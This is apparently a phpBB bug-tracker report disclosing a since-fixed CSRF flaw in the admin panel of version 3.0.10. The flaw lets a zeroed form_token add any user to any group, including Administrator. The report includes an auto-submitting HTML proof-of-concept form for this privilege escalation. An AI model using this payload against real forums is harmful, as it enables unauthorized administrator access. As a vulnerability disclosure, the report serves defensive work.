Uploaded image for project: 'phpBB'
  1. phpBB
  2. PHPBB-10840

If you add a member to a group, the form_token can be set to 0 if the creation_time is 0 too. Maybe even if creation_time is unchanged.

XMLWordPrintable

    • Icon: Bug Bug
    • Resolution: Fixed
    • Icon: Blocker Blocker
    • 3.0.12-RC1
    • 3.0.10
    • ACP
    • None

      You can use Cross Side Request Forgery (if you know the sid) to add users to any group you want.

      Example for the CSRF:

      UrlToAdminIndexPHP: http://www.example.com/phpBB/adm/index.php
      GroupID: 5 (Administrator)
      Username: KDSBest

      This is hard to get normaly
      SID: 73f11ebfa81616c0911ae0c9cbd6010d

      <html>
      <head>
      <script type="text/javascript">
      function submitForm()

      { document.forms[0].submit(); }

      </script>
      </head>
      <body onLoad="submitForm()">
      <form action="

      {UrlToAdminIndexPHP}

      ?&sid=

      {SID}

      &i=groups&icat=12&mode=manage&g=

      {GroupID}

      " method="post" id="list">
      <input type="hidden" value="0" name="leader">
      <input type="hidden" value="0" name="default">
      <input type="hidden" value="

      {Username}

      " name="usernames">
      <input type="hidden" value="XXX" name="addusers">
      <input type="hidden" value="0" name="creation_time">
      <input type="hidden" value="0" name="form_token">
      </form>
      </body>
      </html>

      To make it harder to create a CSRF the field form_token should be checked server side.

            nickvergessen Joas Schilling
            kdsbest kdsbest
            Votes:
            0 Vote for this issue
            Watchers:
            0 Start watching this issue

              Created:
              Updated:
              Resolved: